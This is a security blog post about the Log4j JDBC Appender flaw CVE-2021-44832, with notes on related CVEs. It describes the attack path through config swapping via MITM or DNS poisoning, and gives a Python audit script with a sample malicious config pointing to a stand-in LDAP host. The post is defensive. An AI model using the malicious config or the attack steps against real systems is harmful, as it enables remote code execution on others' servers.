Log4j 2.17.0 RCE Vulnerability — CVE-2021-44832

CVE-2021-44832 (JDBC Appender — RCE)

CVE-2021-45105 (Thread Context Map — uncontrolled recursion from self-referential lookups)

CVE-2021-45046 (Non-default configuration of the Thread Context Map results in RCE and information leak via JNDI lookup)

CVE-2021-4104 (JMS Appender in log4j 1.2 — RCE similar to CVE-2021-44228)

CVE-2021-44228 (Vulnerable JNDI — RCE)

Q1: JNDI again? Wasn't JNDI lookup disabled in 2.16.0?

Source: Checkmarx

Attack Path:

  1. A malicious configuration file containing a DataSource element pointing to the attacker-controlled LDAP referral server is uploaded to or hosted on a remote server or cloud storage.
  2. When the logger object is initialized, a request for the configuration file is made; that request is where the manipulation happens, so that the malicious configuration file is fetched instead.
  3. The attacker performs a MITM or DNS poisoning to capture and manipulate the request that fetches the legitimate config file from a trusted remote server, redirecting it to the address of the attacker-controlled server hosting the malicious config file.
  4. When this config.xml is loaded, the <DataSource jndiName> it contains points to the address of the attacker-controlled LDAP server, and the JNDI lookup is performed.
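As an added example (not code from the original post or from the Log4j project), the following Python script audits a Log4j 2 XML configuration for the pattern the attack path above relies on: a JDBC Appender whose DataSource jndiName lies outside the java: namespace, which is the name restriction Log4j 2.17.1 introduced for this CVE. It also classifies where a configuration is loaded from, since step 3 depends on intercepting a plaintext fetch. The two sample configurations, the host name attacker.invalid and the function names are constructed for this example.

```python
"""Audit a Log4j 2 XML configuration for the CVE-2021-44832 pattern
(JDBC Appender DataSource with a non-java: jndiName) and classify the
configuration source. Added example; not the post's or the project's code."""
import xml.etree.ElementTree as ET
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed sample configurations for this example. The host name
# attacker.invalid is a placeholder (the .invalid TLD never resolves).
SAFE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="APP_LOGS">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="MESSAGE" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>"""

MALICIOUS_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Appender type="JDBC" name="db" tableName="APP_LOGS">
      <DataSource jndiName="ldap://attacker.invalid:1389/a"/>
      <Column name="MESSAGE" pattern="%m"/>
    </Appender>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>"""


def _is_jdbc_appender(elem: ET.Element) -> bool:
    """Log4j accepts either <JDBC> or the generic <Appender type="JDBC"> form
    and matches element names case-insensitively, so do the same here."""
    tag = elem.tag.lower()
    return tag == "jdbc" or (tag == "appender" and elem.get("type", "").lower() == "jdbc")


def find_unsafe_jndi_datasources(xml_text: str) -> List[Tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC Appender DataSource whose
    jndiName is not a java: name. Log4j 2.17.1 rejects such names; 2.17.0 and
    earlier hand them to JNDI, which is what lets the config reach an LDAP server."""
    root = ET.fromstring(xml_text)
    findings: List[Tuple[str, str]] = []
    for elem in root.iter():
        if not _is_jdbc_appender(elem):
            continue
        name = elem.get("name", "<unnamed>")
        for child in elem.iter():
            if child.tag.lower() == "datasource":
                jndi = child.get("jndiName", "")
                if not jndi.lower().startswith("java:"):
                    findings.append((name, jndi))
    return findings


def classify_config_source(location: str) -> str:
    """Classify a configuration file location (assumed to be the value Log4j
    would resolve, e.g. log4j2.configurationFile). A plaintext http fetch is the
    case step 3 above relies on: the response can be swapped in transit."""
    scheme = urlparse(location).scheme.lower()
    if scheme in ("", "file", "jar", "classpath") or len(scheme) == 1:
        return "local"  # single-letter scheme is a Windows drive letter, not a URL
    if scheme == "https":
        return "remote-tls"
    return "remote-plaintext"


if __name__ == "__main__":
    for label, cfg in (("safe", SAFE_CONFIG), ("malicious", MALICIOUS_CONFIG)):
        print(label, find_unsafe_jndi_datasources(cfg))
    for loc in ("/etc/app/log4j2.xml", "https://cfg.example/log4j2.xml",
                "http://cfg.example/log4j2.xml"):
        print(loc, classify_config_source(loc))
```

Running the script on the malicious sample reports the appender "db" with its ldap:// name, while the safe sample reports nothing; a configuration fetched over plain http is flagged separately, because even a clean file is only as trustworthy as the channel it arrives over.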

Recommendations:


I am Jayaraman M, a passionate information security Analyst/Penetration Tester/Red Teamer who thrives hard to achieve greater heights in the cyber security.
